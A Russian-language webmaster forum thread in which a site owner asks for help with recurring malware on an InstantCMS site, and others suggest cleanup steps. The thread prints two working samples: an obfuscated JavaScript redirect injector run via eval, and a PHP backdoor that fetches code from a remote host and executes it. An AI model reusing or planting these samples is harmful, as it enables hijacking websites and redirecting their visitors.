Прошу помочь всех знатоков

Не могу избавится от заразы которая поразила мой сайт

 
Посетитель
small user social cms
Сообщений: 44
Всем привет, подскажите пожалуйста, у меня сайт на INSTATCMS ВЕРСИИ v1.10.1 да понимаю что она уже устарела, но проблема не в этом у меня такая проблема купился мой братец на бесплатную услугу по прогону сайта по каталогам , сайт вообщем его, но я ему помогаю.., вот в итоге он сделал все по инструкции как было описана на сайте http://progon.site/ залил в корень сайта файлик который и приоткрыл дверь Хакером, для внедрения своего кода, теперь сайт был исчез из поиска + срабатывает периадресация с сайта на сайты-вирусы и происходит это по сценарию..
в итоге я обнаружил что все файлы с расширением .js были заражены и в конце был вставлен код

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());



прошерудил весь сайт удалил везде, еще раз переправерил скриптом для поиска данного кода. в итоге избавились от этой заразы, сменили все данные от хоста, сайт вновь начал индексироваться поисковиками, и как вдруг снова эта зараза заразила все файлы, снова все удалил, однако я так понимаю что где то все же есть уязвимость после первого инцидента что, снова сайт был поражен. Прошу всех знатоков помочь с данной проблемой..
Посетитель
small user social cms
МедальАвторитет форумаКубок зрительских симпатий
Сообщений: 2603
если вредоносный код в таком явном виде присутствует скачайте сайт на компьютер и выполните поиск фрагмента кода по файлам сайта.
как вариант полностью очистите папку с сайтом залейте чистый архив с сайтом, в конфиге поправьте связь с базой данных, потом закачайте в соответствующие папки файлы типа фотографии, аватары, скриншоты видео.
Каталоги с файлами которые будете заливать сначала проверить на присутствие в них посторонних файлов, например в папке с фотографиями какой нибудь скрипт лежит, и можно проверить антивирусом, по идее вредонос может маскироваться и под файл изображения.

А пароль от базы данных меняли? может в БД что нибудь хранится что открывает дверь.

Возможно ваша ситуация не связана с тем, что вы описали

Gagik:
залил в корень сайта файлик

и вас ломают через ваш зараженный компьютер? Крякнутый тотал коммандер используете?

Можете попробовать просканировать сайт этим https://yandex.ru/promo/manul/
Реклама
cms
Посетитель
small user social cms
МедальПочетный донор проектаАвторитет форумаКубок зрительских симпатийПочетный донор проекта
Сообщений: 2571
Была похожая проблема. Имхо, тут поможет только:

1. на локалке начисто установить 1.10.1
2. Подключить базу от вашего сайта, изменив настройки в config
3. залить свой шаблон, проверив каждый файл
4. добавить в папки upload и images картинки с вашего сайта
5. сменить пароли подключения к базе, пароли от админа сайта

Получившееся залить на сайт.
Виджеты, поля и компоненты для instantcms 2 http://www.zau4man.ru/
Посетитель
small user social cms
Сообщений: 44
Нил™:

если вредоносный код в таком явном виде присутствует скачайте сайт на компьютер и выполните поиск фрагмента кода по файлам сайта.
как вариант полностью очистите папку с сайтом залейте чистый архив с сайтом, в конфиге поправьте связь с базой данных, потом закачайте в соответствующие папки файлы типа фотографии, аватары, скриншоты видео.
Каталоги с файлами которые будете заливать сначала проверить на присутствие в них посторонних файлов, например в папке с фотографиями какой нибудь скрипт лежит, и можно проверить антивирусом, по идее вредонос может маскироваться и под файл изображения.

А пароль от базы данных меняли? может в БД что нибудь хранится что открывает дверь.

Возможно ваша ситуация не связана с тем, что вы описали

Gagik:
залил в корень сайта файлик

и вас ломают через ваш зараженный компьютер? Крякнутый тотал коммандер используете?

Можете попробовать просканировать сайт этим https://yandex.ru/promo/manul/

Тут я думаю это не поможет все верно говоришь по мне тоже, что то в базе спрятано от моих глаз, а найти так пока и не смог, буду искать дальше, пере заливать сайт морока, ведь многое под себя подкорректировал
Посетитель
small user social cms
Сообщений: 44
Нил™:

если вредоносный код в таком явном виде присутствует скачайте сайт на компьютер и выполните поиск фрагмента кода по файлам сайта.
как вариант полностью очистите папку с сайтом залейте чистый архив с сайтом, в конфиге поправьте связь с базой данных, потом закачайте в соответствующие папки файлы типа фотографии, аватары, скриншоты видео.
Каталоги с файлами которые будете заливать сначала проверить на присутствие в них посторонних файлов, например в папке с фотографиями какой нибудь скрипт лежит, и можно проверить антивирусом, по идее вредонос может маскироваться и под файл изображения.

А пароль от базы данных меняли? может в БД что нибудь хранится что открывает дверь.

Возможно ваша ситуация не связана с тем, что вы описали

Gagik:
залил в корень сайта файлик

и вас ломают через ваш зараженный компьютер? Крякнутый тотал коммандер используете?

Можете попробовать просканировать сайт этим https://yandex.ru/promo/manul/
Вот содержание файла с которого все началось:
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL3Byb2dvbi5zaXRlL3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>
В начало страницы
Предыдущая темаСледующая тема Перейти на форум:
Быстрый ответ
Чтобы писать на форуме, зарегистрируйтесь или авторизуйтесь.